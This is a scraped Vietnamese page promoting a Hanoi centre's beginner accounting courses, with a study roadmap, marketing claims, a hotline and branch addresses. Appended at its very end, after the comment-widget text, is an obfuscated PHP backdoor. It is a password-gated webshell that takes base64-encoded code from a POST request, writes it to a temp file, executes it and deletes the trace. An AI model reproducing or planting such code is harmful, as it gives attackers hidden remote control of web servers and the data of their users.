1

Lớp học kế toán cho người mới bắt đầu từ cơ bản

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Khóa học kế toán từ cơ bản cho người mới bắt đầu hoặc đã học kế toán nhưng mất gốc do làm trái ngành muốn quay lại nghề.

Sau đây mình xin chia sẻ và giới thiệu cho các bạn tự tin hơn và không còn bỡ ngỡ khi chưa biết bắt đầu từ đâu, học như thế nào có một lộ trình học kế toán từ con số 0 đến khi đọc hiểu Báo Cáo Tài Chính và thành thạo nghề đi xin việc đi làm.

Bước 1: Nắm chắc Nguyên lý kế toán để có thể hạch toán (định khoản) thành thạo các nghiệp vụ kinh tế phát sinh

– Người mới bắt đầu tự học làm kế toán thì đầu tiên phải nắm chắc kiến thức Nguyên lý kế toán.

– Muốn làm kế toán thì phải biết kế toán là gì, kế toán dùng để làm gì, tầm quan trọng của người làm kế toán cũng như công việc của từng vị trí kế toán.

– Bất cứ công việc gì cũng phải bắt đầu từ những thứ đơn giản nhất. Nắm được kiến thức cơ bản thì tự học kế toán không hề khó.

Các kiến thức trọng tâm trong Nguyên lý kế toán phải nắm được bao gồm:- Hiểu rõ bản chất kế toán là gì?– Nhớ và hiểu được các tài khoản kế toán có trong bảng hệ thống tài khoản kế toán.

Hiện nay, có 02 bảng hệ thống tài khoản kế toán được lựa chọn dùng cho các doanh nghiệp. Đó là bảng hệ thống tài khoản kế toán theo thông tư 133 và theo thông tư 200.

Muốn làm được kế toán, bạn bắt buộc phải nắm chắc các tài khoản kế toán này.

– Nắm được phương pháp hạch toán các nghiệp vụ kinh tế phát sinh diễn ra tại doanh nghiệp của các quá trình hoạt động sản xuất kinh doanh.

Khi làm được điều này, bạn đã có nền móng kế toán tương đối vững chắc, là cơ sở quan trọng để bạn vào làm kế toán thực tế.

Qua quá trình giảng dạy rất nhiều học viên, KẾ TOÁN HÀ NỘI thấy rằng, hầu hết các học viên chưa tự tin làm kế toán là bởi vì họ chưa nắm được kiến thức về nguyên lý kế toán, chưa biết cách sử dụng tài khoản kế toán để định khoản kế toán.

>> Hotline  – Zalo 0973.761.751 tư vấn 24/7

Với phần kiến thức này, kinh nghiệm là bạn phải kiên trì, chịu khó làm nhiều bài tập định khoản trên cơ sở phải hiểu rõ bản chất các tài khoản.

Thực tế điều này không dễ đối với những người mới bắt đầu, khi mà kế toán với họ hoàn toàn mù mịt, mông lung, bị hoang mang giữa rừng kiến thức rộng lớn cả về thông tư, nghị định lẫn kinh nghiệm, lý thuyết của môn học. Họ sẽ rất dễ nản lòng trước thử thách của môn học tưởng chừng khô khan này.

Lời khuyên của các kế toán trưởng dành cho bạn là hãy tìm 1 người thầy tốt để họ vạch ra các ý chính và hướng dẫn bạn thẩm thấu kiến thức đó.

Môn học Nguyên lý kế toán nếu biết học và hiểu được nó thì bạn sẽ ứng dụng được rất rất nhiều vào thực tế. Vì vậy, nếu bạn ở trình độ mới bắt đầu thì nên tham gia 1 khóa học về nguyên lý kế toán. Ở đó sẽ có giáo viên dạy bạn, giúp bạn nhanh đạt được mục tiêu của môn học hơn.

Tại KẾ TOÁN HÀ NỘI, 100% học viên tham gia khóa học Nguyên lý kế toán đều rất hài lòng và đạt được hiệu quả cao sau khi kết thúc khóa học.

Họ đã hiểu về nghề, hiểu về tài khoản kế toán và biết cách định khoản các nghiệp vụ kinh tế phát sinh tại doanh nghiệp. Cái lạ là, cả những đối tượng chưa biết gì về kế toán, học trái ngành và mới bắt đầu học về kế toán đều có thể định khoản các nghiệp vụ kinh tế phát sinh chỉ sau 4 buổi học Nguyên lý do KẾ TOÁN HÀ NỘIh giảng dạy.

Một điều cân lưu ý giúp mình: Đó là trong giai đoạn này, bạn cần làm thật nhiều bài tập để hiểu rõ và nắm chắc được các nội dung của nguyên lý kế toán. Nhớ rằng, nguyên lý kế toán là phần giống nhau ở mọi loại hình doanh nghiệp, nên bạn cần nắm thật chắc phần kiến thức quan trọng này.

Bước 2: Học kế toán thực tế trên chứng từ thực tế và phần mềm kế toán để có thể làm tốt công việc kế toán thực tế, thông qua việc lên được các Báo cáo tài chính, báo cáo thuế, sử dụng được phần mềm kế toán

Có 2 cách để học kế toán thực tế, đó là tự học hoặc tham gia vào khóa học kế toán tổng hợp thực hành.

Cách đầu tiên là tự học. Tự học kế toán sẽ giúp bạn tiết kiệm chi phí nhưng đòi hỏi bạn phải vô cùng cố gắng và đã biết về kế toán. Trên thực tế cách học này cũng đem lại rất ít hiệu quả cho bạn.

Lý do là vì bạn sẽ không biết bắt đầu từ đâu, tự học theo lộ trình như thế nào. Hơn nữa, kiến thức thực tế, văn bản pháp luật về Thuế và Kế toán nhiều và rộng như vậy khiến bạn không biết nên học cái gì trước, học như thế nào mới hiệu quả.

Không chỉ vậy, bạn sẽ bị vướng vào tình trạng đọc rồi mà không được thực hành dẫn đến không thể hình dung và nhớ được. Từ đó khiến những kiến thức mà bạn học được thường manh mún, không có tính hệ thống, và nếu mang áp dụng vào nghề thì rủi ro rất cao.

Cách thứ hai là tham gia vào khóa học kế toán tổng hợp thực hành do các kế toán trưởng lâu năm kinh nghiệm giảng dạy. Đây là cách đem lại hiệu quả nhất đối với đối tượng là những người chưa có kinh nghiệm hoặc ít kinh nghiệm về kế toán.

Khóa học này sẽ giúp bạn hình thành và rèn luyện 2 kỹ năng vô cùng quan trọng của người kế toán, đó là kỹ năng phân tích, xử lý chứng từ và kỹ năng sử dụng phần mềm kế toán.

Họ cũng sẽ đưa ra chứng từ thực tế để bạn nghiên cứu, trải nghiệm và tập làm, thực hành cho thành thạo.

Học như vậy bạn sẽ thấy yên tâm hơn vì mình có 1 hướng đi đúng, cũng như khi làm việc không sợ rủi ro vì có 1 người nhiều kinh nghiệm luôn ở bên hướng dẫn bạn.

Cũng nhờ vậy mà bạn sẽ có nhiều kinh nghiệm hơn, cơ hội công việc cũng sẽ rộng mở hơn sau khi kết thúc khóa học.

Việc có người thầy là kế toán trưởng giỏi luôn ở bên cạnh tư vấn và hỗ trợ bạn trong công việc là vô cùng đáng quý đối với những người làm nghề kế toán, đặc biệt là những người mới bắt đầu học và làm kế toán.

Kế Toán Hà Nội đã được nghe rất nhiều tâm sự của học viên về việc đi làm mà không biết bắt đầu từ đâu, đồng nghiệp không chia sẻ kinh nghiệm … khiến áp lực công việc của họ ngày càng lớn và mất dần niềm yêu thích trong nghề.

Vì thế nên, khi họ biết đến và đăng ký tham gia khóa học kế toán tổng hợp thực hành dành cho người mới bắt đầu tại Kế Toán Hà Nội, họ đã rất biết cách tận dụng cơ hội học hỏi với kế toán trưởng.

Trong giờ học, rất nhiều câu hỏi được nêu ra để nhờ kế toán trưởng tư vấn. Chứng từ kế toán trưởng đưa ra luôn được họ thực hành và phân tích rất kỹ lưỡng.

Bạn luôn nhớ, kế toán trưởng là người có nhiều kinh nghiệm thực tế nên họ có chuyên môn chắc chắn, biết cách hướng dẫn bạn đi con đường ngắn nhất và ít rủi ro nhất để đạt được thành công trong nghề kế toán.

Vì vậy, hãy luôn dành cho họ sự trân trọng và biết ơn và tập trung, cố gắng hết mình trong khóa học. Nếu làm được như vậy thì chắc chắn bạn có thể làm được công việc kế toán tại doanh nghiệp khi kết thúc khóa học kế toán tổng hợp thực hành tại Kế Toán Hà Nội.

Bước 3: Thực hành càng nhiều càng tốt các kiến thức mà kế toán trưởng chia sẻ để sử dụng thành thạo phần mềm kế toán và có được hiểu biết chắc chắn về chứng từ

Sau khi hiểu được những kiến thức và biết cách làm trên chứng từ thực tế được kế toán trưởng đưa ra trong khóa học kế toán tổng hợp thực hành, bạn cần phải thực hành nhiều nhất có thể các chứng từ này cho đến khi nó trở thành kỹ năng của mình.

Nếu bạn chăm chỉ thực hành, chắc chắn sau khóa học, bạn sẽ sử dụng thành thạo phần mềm kế toán, hiểu và tự tin lên được Báo cáo tài chính và Báo cáo Thuế liên quan.

Đây cũng là thời điểm để bạn tự tin nộp hồ sơ xin việc kế toán để có được môi trường trải nghiệm thực tế đúng nghĩa.

Trong quá trình này, nếu có những vấn đề chưa biết cách xử lý, bạn hãy nhờ sự trợ giúp của các anh chị kế toán trưởng, người đã dạy các bạn trong khóa học kế toán thực tế. Các anh chị ấy luôn sẵn sàng hỗ trợ bạn đến khi thành thạo thì thôi.

Để việc tự học kế toán cho người mới bắt đầu thành công đòi hỏi các bạn không chỉ có sự cố gắng, nỗ lực mà còn đòi hỏi ở bạn tình yêu nghề, yêu những con số.

Bên cạnh đó là lộ trình học kế toán cho người chưa biết gì khoa học, cũng như vai trò không thể thiếu của 1 người thầy giỏi ở bên cạnh để dắt bạn vượt qua giai đoạn bắt đầu đầy rẫy khó khăn… 

Vì thế, hãy chuẩn bị cho mình những kiến thức và hành trang tốt nhất để bắt đầu hành trình đường dài để trở thành 1 kế toán trưởng giỏi và chuyên nghiệp.

Một số điểm khác biệt của khóa học kế toán tổng hợp cho người mới bắt đầu tại KẾ TOÁN HÀ NỘI

 • Trung tâm kế toán Kế Toán Hà Nội là một trong số rất ít trung tâm đào tạo kế toán thực hành được cấp phép hiện nay và có tuổi đời gần 20 năm.
 • Giảng viên kế toán trưởn, chuyên gia tài chính đã có trên 15 năm kinh nghiệm sẽ hướng dẫn học viên chi tiết từ làm chủ các tài khoản kế toán, cách định khoản kế toán, thực hành các nghiệp vụ kế toán trên phần mềm Misa… đến lên được báo cáo thuế, báo cáo tài chính.
 • Chương trình giảng dạy được thiết kế bài bản, do chính các giảng viên tại trung tâm biên soạn. Các bài giảng đi từ cơ bản đến nâng cao giúp học viên có thể hiểu và làm được các công việc kế toán phải làm trong thực tế
 • Tặng phần mềm Misa bản quyền full chức năng

Kết quả sau khóa học kế toán cho người mới bắt đầu tại Kế Toán Hà Nội

 • Sau khóa học kế toán tổng hợp bạn có thể tự tin  làm thành thạo các nghiệp vụ kế toán từ cơ bản đến chuyên sâu mà không gặp quá nhiều khó khăn về nghiệp vụ thưc tế 
 • Ngoài kinh nghiệm và kỹ năng làm nghề học viên được hướng dẫn thêm về kỹ năng mềm khi làm việc thực tế, cách sử lý các nghiệp vụ phát sinh, công tác tổ chức kế toán tại doanh nghiệp 
 • Sau khi kết thúc khóa học bạn sẽ có được kinh nghiệm tương đường 6 tháng – 1 năm làm việc thực tế 
 • Hơn 80% học viên tìm  được việc ngay khi tốt nghiệp khóa học có thể làm được việc thực tế 
 • Học viên sẽ nắm vững cách thức thiết lập sổ sách, định khoản, vào sổ và lưu chứng từ.
 • Học viên có thể tự mình thực hiện trọn vẹn các Báo cáo thuế hàng tháng, Báo cáo thuế thu nhập doanh nghiệp hàng quý, Báo cáo tài chính và Quyết toán thuế cuối năm, theo đúng các chuẩn mực và quy định hiện hành.
 • Học xong khóa học tại văn phòng có kết quả bằng 2 năm kinh nghiệm. Học viên tự tin khi đi phỏng vấn tuyển dụng và làm chủ công việc kế toán, có thể tư vấn cho giám đốc về tình hình Tài chính của doanh nghiệp.
 • Biết cách hoạch định kế hoạch phát triển nghề nghiệp lâu dài.
 • Được mời tham dự miễn phí các hội thảo về Kế toán – Tài chính do Công ty đào tạo kế toán Hà Nội và các công ty Kế toán – Kiểm toán tổ chức.
 • Được cấp CHỨNG CHỈ hành nghề kế toán thực tế.

Một số chia sẻ của học viên sau khóa học kế toán cho người mới bắt đầu

– Chuyên cung cấp KHÓA HỌC KẾ TOÁN THỰC HÀNH THỰC CHIẾN ĐỂ RA NGHỀ CHẤT LƯỢNG CAO
– Dịch vụ kế toán cho các công ty giá rẻ uy tín
– Hotline 0973.761.751 (Zalo)

KHÓA HỌC KẾ TOÁN CHO NGƯỜI ĐI LÀM CÓ THỂ BẠN CẦN XEM:

 1. kế toán cho người đi làm
 2. khóa kế toán máy
 3. khóa học báo cáo tài chính
 4. khóa học kế toán thuế

                CÔNG TY CỔ PHẦN TẬP ĐOÀN KẾ TOÁN HÀ NỘI
TRUNG TÂM ĐÀO TẠO KẾ TOÁN HÀ NỘI

CƠ SỞ ĐÀO TẠO TẠI HÀ NỘI:

CS1: Lê Trọng Tấn – Thanh Xuân – Hà Nội.
CS2: Thành Thái – Duy Tân – q Cầu Giấy – Hà Nội.
CS3: KĐT Sài Đồng – Long Biên – Hà Nội.
CS4: Quang Trung – Hà Đông – Hà Nội.
CS5: Minh Khai – Hoàng Mai – Hà Nội
CS6: Nguyên Hồng – Đống Đa – Hà Nội
CS7: Cổ Bi – Gia Lâm – Hà Nội

CƠ SỞ ĐÀO TẠO TẠI PHÍA BẮC:
CS1: Trần Hưng Đạo – Phố Kim Đồng – Tp. Thái Bình.

CS2: Trần Nguyên Hãn – P. Thọ Xương – Tp. Bắc Giang.
CS3: Chu Văn An – Hoàng Văn Thụ –  Tp. Thái Nguyên.
CS4: Giải Phóng – Tp. Nam Định.
CS5: Lê Văn Thịnh – Tp. Bắc Ninh.
CS6: Kênh Dương – p Kênh Dương – Tp. Hải Phòng.
CS7: Chu Văn An – Vĩnh Yên – Vĩnh Phúc.
CS8: Đoàn Nhữ Hải – p Quang Trung – Hải Dương
CS9: Nguyễn Văn Cừ – TP Hạ Long – Quảng Ninh.
CS10: Tràng An – p Tân Thành – tp Ninh Bình.

CƠ SỞ ĐÀO TẠO TẠI MIỀN TRUNG VÀ MIỀN NAM:
CS1: Lê Văn Chí – p. Linh Chiểu – q. Thủ Đức HCM
CS2: Đường CMT8 – Quận 3 HCM
CS3: Vân Côi, phường 7, q. Tân Bình HCM
CS4: Nguyễn Văn Vịnh, q. Tân Phú HCM
CS3: Hoàng Hoa Thám, p. Hiệp Thành, tp. Thủ Dầu 1 (Bình Dương)
CS4: Trương Định, p. An Cư, q. Ninh Kiều, tp Cần Thơ
CS5: Đường Trần Hưng Đạo, tp Long Xuyên, tỉnh An Giang
CS6: Thái Sanh Hạnh, KP6, p.9, tp Mỹ Tho, tỉnh Tiền Giang
CS7: Nguyễn Du, Phường 1, tp Vũng Tàu
CS8: Hà Huy Giáp, phường Quyết Thắng, TP. Biên Hòa, Đồng Nai
Nghệ An – Hà Tĩnh – Đà Nẵng –  Bến Tre – Bạc Liêu – Vĩnh Long – Kiên Giang – Cà Mau – Trà Vinh

” CHÚNG TÔI CAM KẾT KHÔNG THÀNH NGHỀ KHÔNG THU HỌC PHÍ

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}